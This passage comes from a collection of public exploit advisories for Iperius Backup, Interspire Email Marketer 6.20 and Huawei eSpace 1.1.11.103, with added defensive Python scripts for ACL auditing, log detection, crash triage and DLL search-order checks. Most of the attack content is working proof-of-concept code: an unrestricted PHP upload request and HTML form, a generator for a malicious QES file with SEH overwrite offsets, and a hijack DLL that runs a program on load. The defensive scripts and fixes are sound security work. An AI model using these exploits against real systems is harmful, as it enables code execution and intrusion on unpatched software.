7. Command prompt on attacking machine will appear
   C:\Program Files (x86)\Iperius Backup>whoami
   whoami
   <computer name>\<administrator>
   Or
   C:\Program Files (x86)\Iperius Backup>whoami
   whoami
   nt authority\system

Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System or Administrator.

Notes:
Able to open an elevated command prompt locally if the service is running as Local System, but not when it uses an administrator account. Also able to back up the entire administrator user profile as the low-privilege account.

Fix:
Remove the Everyone permission from the folder c:\ProgramData\IperiusBackup
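The fix comes down to one ACL entry on c:\ProgramData\IperiusBackup. The following Python script is an added example, not part of the advisory: it parses the output of `icacls` for that folder (the text below is constructed to mirror the default the advisory describes) and reports every ACE that hands a principal every local user holds (Everyone, Users, Authenticated Users, INTERACTIVE) a right that allows changing job files.

```python
"""Audit icacls output for low-privilege write access on the Iperius data folder.

Added example, not part of the advisory. SAMPLE_ICACLS is constructed in the layout
`icacls <folder>` prints; the Everyone:(OI)(CI)(F) entry is the condition the advisory
says lets a low-privilege user create and edit backup jobs.
"""
import re

IPERIUS_DIR = r"C:\ProgramData\IperiusBackup"

# Principals that any interactive local user effectively holds.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls simple rights (F, M, W, D) and specific rights that allow writing or deleting.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC", "WDAC", "WO"}

# One ACE: `<principal>:(flag)(flag)...(rights)`; the last group is the access mask.
ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<groups>(?:\([^)]*\))+)\s*$")

# Constructed icacls output (the first line carries the folder path).
SAMPLE_ICACLS = r"""C:\ProgramData\IperiusBackup Everyone:(OI)(CI)(F)
                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                             BUILTIN\Administrators:(I)(OI)(CI)(F)
                             BUILTIN\Users:(I)(OI)(CI)(RX)
                             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_aces(icacls_text, folder):
    """Return a list of (principal, inheritance_flags, rights) for `folder`."""
    aces = []
    for raw in icacls_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully"):
            continue
        if line.lower().startswith(folder.lower()):
            line = line[len(folder):].strip()      # strip the path from the first ACE line
        m = ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        rights = set(groups[-1].split(","))         # e.g. {"F"} or {"RD","WD","AD"}
        flags = set(groups[:-1])                    # OI, CI, IO, I, NP
        aces.append((m.group("principal").strip(), flags, rights))
    return aces


def find_weak_aces(icacls_text, folder):
    """Return (principal, sorted_rights) for ACEs giving low-privilege users write access."""
    weak = []
    for principal, _flags, rights in parse_aces(icacls_text, folder):
        if principal.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            weak.append((principal, sorted(rights)))
    return weak


if __name__ == "__main__":
    for principal, rights in find_weak_aces(SAMPLE_ICACLS, IPERIUS_DIR):
        print(f"[!] {IPERIUS_DIR}: {principal} holds {','.join(rights)}; remove this ACE")
```

Run against the real output of `icacls C:\ProgramData\IperiusBackup` after applying the fix, the list should come back empty.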
-
Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution
# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
# Date: May 2019
# Exploit Author: Numan Türle
# Vendor Homepage: https://www.interspire.com
# Software Link: https://www.interspire.com/emailmarketer
# Version: 6.20<
# Tested on: windows
# CVE : CVE-2018-19550
# https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813

surveys_submit.php

if (isset($_FILES['widget']['name'])) {
    $files = $_FILES['widget']['name'];
    foreach ($files as $widgetId => $widget) {
        foreach ($widget as $widgetKey => $fields) {
            foreach ($fields as $fieldId => $field) {
                // gather file information
                $name    = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value'];
                $type    = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value'];
                $tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value'];
                $error   = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value'];
                $size    = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value'];

                // if the upload was successful to the temporary folder, move it
                if ($error == UPLOAD_ERR_OK) {
                    $tempdir     = TEMP_DIRECTORY;
                    $upBaseDir   = $tempdir . DIRECTORY_SEPARATOR . 'surveys';
                    $upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId;
                    $upDir       = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId();

                    // if the base upload directory doesn't exist create it
                    if (!is_dir($upBaseDir)) {
                        mkdir($upBaseDir, 0755);
                    }
                    if (!is_dir($upSurveyDir)) {
                        mkdir($upSurveyDir, 0755);
                    }
                    // if the upload directory doesn't exist create it
                    if (!is_dir($upDir)) {
                        mkdir($upDir, 0755);
                    }

                    // upload the file: the client-supplied name is used unchecked
                    move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name);
                }
            }
        }
    }
}

input file name : widget[0][field][][value]
submit : surveys_submit.php?formId=1337

POST /iem/surveys_submit.php?formId=1337 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2
Content-Length: 340

------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryF2dckZgrcE306kH2--

#### POC

<!DOCTYPE HTML>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <title></title>
</head>
<body>
    <form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data">
        <input type="file" name="widget[0][field][][value]">
        <input type="submit" value="submit" name="submit">
    </form>
</body>
</html>

URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}
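The handler above leaves two traces in a web server's access log: a POST to surveys_submit.php and, if the uploaded file is then executed, a GET for a script under admin/temp/surveys/<formId>/<responseId>/. The following Python detection is an added example, not part of the advisory; the Apache combined-format log lines are constructed, and the URL patterns are the ones the advisory gives.

```python
"""Flag access-log evidence of a surveys_submit.php upload being executed.

Added example, not part of the advisory. SAMPLE_LOG is constructed in Apache combined
format; the endpoint and the admin/temp/surveys/<formId>/<id>/<name> location come
from the vulnerable handler shown in the advisory.
"""
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# The upload endpoint; any POST here may carry a file in widget[..][field][..][value].
UPLOAD_RE = re.compile(r"/surveys_submit\.php(?:\?|$)", re.I)
# A server-side script fetched from the directory the handler moves uploads into.
TEMP_SCRIPT_RE = re.compile(
    r"/admin/temp/surveys/\d+/\d+/[^/?]+\.(?:php\d?|phtml|phar)(?:[?/]|$)", re.I
)

SAMPLE_LOG = """\
10.0.0.5 - - [14/May/2019:10:01:02 +0000] "GET /iem/index.php HTTP/1.1" 200 5123
10.0.0.5 - - [14/May/2019:10:01:09 +0000] "POST /iem/surveys_submit.php?formId=1337 HTTP/1.1" 302 0
10.0.0.5 - - [14/May/2019:10:01:15 +0000] "GET /iem/admin/temp/surveys/1337/12/info.php HTTP/1.1" 200 88120
10.0.0.7 - - [14/May/2019:10:05:00 +0000] "POST /iem/surveys_submit.php?formId=2 HTTP/1.1" 302 0
10.0.0.7 - - [14/May/2019:10:05:03 +0000] "GET /iem/surveys.php?id=2 HTTP/1.1" 200 3011
10.0.0.9 - - [14/May/2019:11:00:00 +0000] "GET /iem/admin/temp/surveys/1337/13/x.php5?cmd=id HTTP/1.1" 404 210
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect(lines, window=timedelta(minutes=10)):
    """Return (ip, path, severity, correlated) for each script fetch under temp/surveys.

    severity is HIGH when the server answered 200 (the script ran) and MEDIUM otherwise;
    correlated is True when the same client POSTed to surveys_submit.php within `window`.
    """
    last_upload = {}            # client ip -> time of its last upload POST
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and UPLOAD_RE.search(rec["path"]):
            last_upload[rec["ip"]] = rec["ts"]
            continue
        if TEMP_SCRIPT_RE.search(rec["path"]):
            severity = "HIGH" if rec["status"] == 200 else "MEDIUM"
            prev = last_upload.get(rec["ip"])
            correlated = prev is not None and rec["ts"] - prev <= window
            alerts.append((rec["ip"], rec["path"], severity, correlated))
    return alerts


if __name__ == "__main__":
    for ip, path, severity, correlated in detect(SAMPLE_LOG.splitlines()):
        tag = "after upload POST" if correlated else "no matching upload seen"
        print(f"[{severity}] {ip} fetched {path} ({tag})")
```

A 404 on such a path (the last sample line) still deserves a look, since it is the sort of probing that precedes a successful upload.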
-
Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite
#
#
# Vendor: Huawei Technologies Co., Ltd.
# Product web page: https://www.huawei.com
# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290
# Affected module: cenwpoll.dll 1.0.8.8
# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe
#
# Product description:
# --------------------
# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of
#    products. Huawei's EC Suite (ECS) solution combines voice, data, video, and service streams, and provides
#    users with easy and secure access to their service platform from any device, in any place, at any time.
# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using
#    the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.
#
# Vulnerability description:
# --------------------------
# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (SEH overwrite) because it fails
# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when
# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of
# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
#
# Tested on:
# ----------
# OS Name: Microsoft Windows 7 Professional
# OS Version: 6.1.7601 Service Pack 1 Build 7601
# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz
#
# Vulnerability discovered by:
# ----------------------------
# Gjoko 'LiquidWorm' Krstic
# Senior STTE
# SCD-ERC
# Munich, Germany
# 26th of August (Tuesday), 2014
#
# PSIRT details:
# --------------
# Security advisory No.: Huawei-SA-20141217- espace
# Initial release date: Dec 17, 2014
# Vulnerability ID: HWPSIRT-2014-1151
# CVE ID: CVE-2014-9415
# Patched version: eSpace Meeting V100R001C03
# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589
#
#
# ------------------------------------ WinDBG output ------------------------------------
#
# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045
# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll -
# cenwpoll!DllUnregisterServer+0xa59e:
# 05790f3e 8178082c010000  cmp     dword ptr [eax+8],12Ch ds:0023:00000008=????????
# 0:008> !exchain
# 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
# mcstub+10041 (00410041)
# Invalid exception stack at 00410041
# Instruction Address: 0x0000000005790f3e
#
# Description: Exception Handler Chain Corrupted
# Short Description: ExceptionHandlerCorrupted
# Exploitability Classification: EXPLOITABLE
# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)
#
# Corruption of the exception handler chain is considered exploitable
#
# 0:008> d ebp
# 02fecd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 02fecd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 02fecd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 02fecd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 02fecd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 02fecd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 02fecd60  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 02fecd70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 0:008> u ebp
# 02fecd00 41              inc     ecx
# 02fecd01 004100          add     byte ptr [ecx],al
# 02fecd04 41              inc     ecx
# 02fecd05 004100          add     byte ptr [ecx],al
# 02fecd08 41              inc     ecx
# 02fecd09 004100          add     byte ptr [ecx],al
# 02fecd0c 41              inc     ecx
# 02fecd0d 004100          add     byte ptr [ecx],al
#
# ------------------------------------ /WinDBG output ------------------------------------
#
#

import sys, os, time

os.system('title jterm')
os.system('color f5')
os.system('cls')

piton = os.path.basename(sys.argv[0])

def usage():
    print '''
    +---------------------------------------------+
    |  eSpace Meeting Stack Buffer Overflow Vuln  |
    |                                             |
    |  Vuln ID: HWPSIRT-2014-1151                 |
    |  CVE ID: CVE-2014-9415                      |
    +---------------------------------------------+
    '''
    if len(sys.argv) < 2:
        print 'Usage: \n\n\t'+piton+' <OPTION>'
        print '\nOPTION:\n'
        print '\t0 - Create the evil PoC file.'
        print '\t1 - Create the evil file, start the vulnerable application and crash it.'
        print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n'
        quit()

usage()

crash = sys.argv[1]
dir = os.getcwd()
file = "evilpoll.qes"

header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x.....

time.sleep(1)

# Overwrite FS:[0] chain (\x43 = EIP)
buffer  = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode)
buffer += '\x00\x01\x00\x00\x00\x00\x00\x90'
buffer += '\x85\xA9\xD7\x00\x01\x04\x00'
buffer += 'TEST'+'\x01\x02\x05\x00'
buffer += 'ANSW1'+'\x05\x00'
buffer += 'ANSW2'

poc = header + buffer
bytes = len(poc)

print '[+] Creating evil PoC file...'
time.sleep(1)
print '[+] Buffering:\n'
time.sleep(1)

index = 0
while index < len(poc):
    char = poc[index]
    #print char,
    sys.stdout.write(char)
    time.sleep(10.0 / 1000.0)
    index = index + 1

try:
    # binary mode so no byte of the payload is subject to newline translation on Windows
    writeFile = open (file, 'wb')
    writeFile.write( poc )
    writeFile.close()
    time.sleep(1)
    print '\n\n[+] File \"'+file+'\" successfully created!'
    time.sleep(1)
    print '[+] Location: "'+dir+'"'
    print '[+] Wrote '+str(bytes)+' bytes.'
except:
    print '[-] Error while creating file!\n'

if crash == '0':
    print '\n\n[+] Done!\n'
elif crash == '1':
    print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n'
    os.system('pause')
    os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"')
elif crash == '2':
    print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n'
    os.system('pause')
    os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe" "%~dp0evilpoll.qes"')
    print '\n[+] You should see something like this in WinDBG:'
    print '''
    0:000> d 0012e37c
    0012e37c  42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00  B.B.C.C.D.D.D.D.
    0012e38c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
    0012e39c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
    0012e3ac  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
    0012e3bc  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
    0012e3cc  44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00  D.D.D.D.D.D.N.e.
    0012e3dc  77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00  w. .P.o.l.l.....
    0012e3ec  c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00  ....V4x.p.......
    0:000> !exchain
    0012e37c: 00430043
    Invalid exception stack at 00420042
    '''
else:
    print '[+] Have a nice day! ^^\n'
    quit()

print '\n[+] Have a nice day! ^^\n'
#os.system('color 07')
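The `!exchain` output the script says to expect is the whole exploitability argument: both words of the SEH record are ASCII characters the application widened to UTF-16. The following Python triage helper is an added example, not part of the advisory; it parses that output, decodes each 32-bit value back to the narrow characters, and maps them to offsets in the PoC's title field (SAMPLE_EXCHAIN is copied from the script's expected output, TITLE_PATTERN mirrors the PoC's buffer layout).

```python
"""Triage a WinDBG !exchain record against a UTF-16-widened fuzz pattern.

Added example, not part of the advisory. A handler value like 0x00430043 is the bytes
43 00 43 00, i.e. "CC" after the application widened the narrow input, so the record
is attacker-controlled; locating "CC" in the narrow payload gives the overwrite offset.
"""
import re
import struct

# Narrow title-field layout from the PoC: 353 'A', nSEH 'BB', SEH 'CC', 42 'D', then the name.
TITLE_PATTERN = "A" * 353 + "BB" + "CC" + "D" * 42 + "New Poll"

# The !exchain output the script tells the reader to expect (constructed sample).
SAMPLE_EXCHAIN = """0:000> !exchain
0012e37c: 00430043
Invalid exception stack at 00420042
"""

# handler word on one line (optionally in parentheses after a symbol), next-pointer on the next.
EXCHAIN_RE = re.compile(
    r"(?P<handler>[0-9a-f]{8})\)?[ \t]*\r?\n[ \t]*Invalid exception stack at (?P<next>[0-9a-f]{8})",
    re.I,
)


def decode_widened(value):
    """Return the narrow text a 32-bit value spells as UTF-16LE, or None.

    Only values whose high bytes are zero and whose characters are printable ASCII
    qualify, which is exactly what a widened ASCII pattern looks like on the stack.
    """
    raw = struct.pack("<I", value)
    if raw[1] != 0 or raw[3] != 0:
        return None
    text = raw.decode("utf-16-le")
    return text if text.isascii() and text.isprintable() else None


def triage_exchain(exchain_text, pattern=TITLE_PATTERN):
    """Map the overwritten SEH record back to offsets in the narrow payload.

    Returns None when no corrupted chain is found; otherwise a dict with the raw
    values, their decoded text, their offsets in `pattern` (-1 if absent) and a
    `controlled` flag set when both words come from the pattern.
    """
    m = EXCHAIN_RE.search(exchain_text)
    if not m:
        return None
    result = {}
    for field in ("handler", "next"):
        value = int(m.group(field), 16)
        text = decode_widened(value)
        result[field] = value
        result[field + "_text"] = text
        result[field + "_offset"] = pattern.find(text) if text else -1
    result["controlled"] = all(result[f + "_offset"] >= 0 for f in ("handler", "next"))
    return result


if __name__ == "__main__":
    r = triage_exchain(SAMPLE_EXCHAIN)
    print(f"handler 0x{r['handler']:08x} = {r['handler_text']!r} at narrow offset {r['handler_offset']}")
    print(f"next    0x{r['next']:08x} = {r['next_text']!r} at narrow offset {r['next_offset']}")
    print("SEH record is attacker-controlled" if r["controlled"] else "SEH record not from pattern")
```

The same decoder applied to the live crash above (handler 00410041) yields "AA" at offset 0, which is why the first run only proved the overwrite and the B/C/D bytes were added to pin the offsets down.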
-
Huawei eSpace 1.1.11.103 - DLL Hijacking
/*
Huawei eSpace Desktop DLL Hijacking Vulnerability

Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)

Summary: Create more convenient Enhanced Communications (EC) services for your enterprise
with this suite of products. Huawei's EC Suite (ECS) solution combines voice, data, video,
and service streams, and provides users with easy and secure access to their service
platform from any device, in any place, at any time. The eSpace Meeting allows you to join
meetings that support voice, data, and video functions using the PC client, the tablet
client, or an IP phone, or in a meeting room with an MT deployed.

Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused by the
application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and airpcap.dll)
in an insecure manner. This can be exploited to load arbitrary libraries by tricking
a user into opening a related application file (.html, .jpg, .png) located on a remote
WebDAV or SMB share.

Tested on: Microsoft Windows 7 Professional

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
19.08.2014

Patched version: V200R003C00
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
CVE ID: CVE-2014-9416
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
*/

// gcc -shared -o mfc71enu.dll exploit.c

#include <windows.h>

// Declared before DllMain so the call below is not an implicit declaration.
int exec(void)
{
    // Proof of loading only: pops the calculator in the host process.
    WinExec("calc.exe", SW_NORMAL);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    exec();
    return 0;
}
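Why the four libraries named above are hijackable comes down to search order: if none of the trusted directories contains the DLL, the loader keeps walking and reaches the current directory, which for a document opened from a share is the share itself. The following Python audit is an added example, not part of the advisory; it models the legacy search order (application directory, system directories, then current directory) over a constructed directory layout and reports every name the trusted directories cannot satisfy.

```python
"""Report which of the advisory's libraries resolve outside a trusted directory.

Added example, not part of the advisory. The directory layout built by build_lab()
is an assumption made for the demonstration; the search order modelled is the legacy
one (application dir, system dirs, then the current directory).
"""
import tempfile
from pathlib import Path

# Libraries the advisory lists as loaded insecurely by eSpace.
WATCHED_DLLS = ("mfc71enu.dll", "mfc71loc.dll", "tcapi.dll", "airpcap.dll")


def resolve_dll(name, trusted_dirs, cwd):
    """Return (path, trusted) for the first directory holding `name`, or (None, False)."""
    for d in trusted_dirs:
        candidate = Path(d) / name
        if candidate.is_file():
            return candidate, True
    candidate = Path(cwd) / name
    if candidate.is_file():
        return candidate, False        # reached only because no trusted copy exists
    return None, False


def audit(app_dir, system_dirs, cwd, names=WATCHED_DLLS):
    """Map each name the trusted directories cannot satisfy to a short finding."""
    findings = {}
    for name in names:
        path, trusted = resolve_dll(name, [app_dir, *system_dirs], cwd)
        if trusted:
            continue
        findings[name] = ("resolved from untrusted directory" if path
                          else "not found in trusted directories")
    return findings


def build_lab():
    """Constructed layout: the app ships mfc71loc.dll, the system has tcapi.dll,
    a share offered to the user holds mfc71enu.dll, and airpcap.dll exists nowhere."""
    root = Path(tempfile.mkdtemp(prefix="espace_dll_lab_"))
    app, system, share = root / "cwbin", root / "System32", root / "share"
    for d in (app, system, share):
        d.mkdir()
    (app / "mfc71loc.dll").write_bytes(b"")
    (system / "tcapi.dll").write_bytes(b"")
    (share / "mfc71enu.dll").write_bytes(b"")
    return app, system, share


if __name__ == "__main__":
    app, system, share = build_lab()
    for name, finding in audit(app, [system], share).items():
        print(f"[!] {name}: {finding}; ship it in {app} or restrict the search path")
```

Either finding is fixed the same way: install the library beside the executable (or drop the dependency) so the search never reaches a directory the user does not control.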
-
Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow
Huawei eSpace Meeting Image File Format Handling Buffer Overflow Vulnerability

Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)

Summary: Create more convenient Enhanced Communications (EC) services for your enterprise
with this suite of products. Huawei's EC Suite (ECS) solution combines voice, data, video,
and service streams, and provides users with easy and secure access to their service
platform from any device, in any place, at any time. The eSpace Meeting allows you to join
meetings that support voice, data, and video functions using the PC client, the tablet
client, or an IP phone, or in a meeting room with an MT deployed.

Desc: eSpace Meeting conference whiteboard functionality is vulnerable to a buffer overflow
issue when inserting known image file formats. Attackers can exploit this issue to execute
arbitrary code within the context of the affected application. Failed exploit attempts will
likely result in denial-of-service conditions.

Vuln modules (no DEP/ASLR):
C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll
C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.dll

Tested on: Microsoft Windows 7 Professional

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
23.09.2014

Patched version: V100R001C03
Vuln ID: HWPSIRT-2014-1156
CVE ID: CVE-2014-9417
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589

--

Reference magic numbers (hex signature):

JPG/JPEG - FF D8 FF
BMP      - 42 4D
PNG      - 89 50 4E 47 0D 0A 1A 0A

0:024> g
CClassMgrFrameWnd::OnKeyUp lParam = -1072758783Get config of string parameter:box, value: (2110.2258): Unknown exception - code c0000002 (first chance)
(2110.2258): Unknown exception - code c0000002 (first chance)
(2110.1b08): C++ EH exception - code e06d7363 (first chance)
(2110.1b08): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=036de3f4 ebx=01709870 ecx=00000003 edx=00000000 esi=7c380edc edi=036de484
eip=75ae812f esp=036de3f4 ebp=036de444 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll -
KERNELBASE!RaiseException+0x54:
75ae812f c9              leave
0:008> d esp
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MSVCR71.dll -
036de3f4  63 73 6d e0 01 00 00 00-00 00 00 00 2f 81 ae 75  csm........./..u
036de404  03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c  .... .....m.0.=|
036de414  00 00 00 00 18 00 00 00-14 33 41 7c 60 e4 6d 03  .........3A|`.m.
036de424  b3 16 34 7c 00 00 9c 01-00 00 00 00 b8 16 34 7c  ..4|..........4|
036de434  44 4b 41 7c 98 e4 6d 03-70 98 70 01 98 98 70 01  DKA|..m.p.p...p.
036de444  84 e4 6d 03 ed 9a 35 7c-63 73 6d e0 01 00 00 00  ..m...5|csm.....
036de454  03 00 00 00 78 e4 6d 03-98 98 70 01 54 16 3d 7c  ....x.m...p.T.=|
036de464  63 73 6d e0 01 00 00 00-00 00 00 00 00 00 00 00  csm.............
0:008> d
036de474  03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c  .... .....m.0.=|
036de484  a8 e4 6d 03 5a 8b 3c 7c-98 e4 6d 03 30 82 3d 7c  ..m.Z.<|..m.0.=|
036de494  54 2b fc ab 54 16 3d 7c-58 a9 71 01 01 00 00 00  T+..T.=|X.q.....
036de4a4  70 16 3d 7c 3c e8 6d 03-e0 d9 b0 04 00 00 00 00  p.=|<.m.........
036de4b4  66 13 af 04 54 2b fc ab-80 94 6f 01 3c e8 6d 03  f...T+....o.<.m.
036de4c4  30 ed 6d 03 00 00 00 00-ec e4 6d 03 00 00 00 00  0.m.......m.....
036de4d4  0b 00 00 00 00 00 00 00-41 41 41 41 41 41 41 41  ........AAAAAAAA
036de4e4  41 41 41 41 41 41 41 41-28 00 00 00 41 41 00 00  AAAAAAAA(...AA..
0:008> d
036de4f4  41 41 00 00 41 41 41 41-00 00 00 00 54 2b fc ab  AA..AAAA....T+..
036de504  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
036de514  00 00 00 00 24 ed 6d 03-22 a0 af 76 43 f0 ed 63  ....$.m."..vC..c
036de524  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
036de534  30 ed 6d 03 45 76 58 06-42 4d 00 0d 41 41 41 41  0.m.EvX.BM..AAAA
036de544  41 41 41 41 41 41 6d 03-3b 23 af 04 3c e8 6d 03  AAAAAAm.;#..<.m.
036de554  80 94 6f 01 88 ef 6d 03-05 02 00 00 00 00 00 00  ..o...m.........
036de564  73 00 70 00 84 f2 b0 04-00 00 00 00 00 00 00 00  s.p.............
0:008> d
036de574  42 4d 00 0d 41 41 41 41-41 41 41 41 41 41 41 41  BM..AAAAAAAAAAAA
036de584  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
036de594  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
036de5a4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
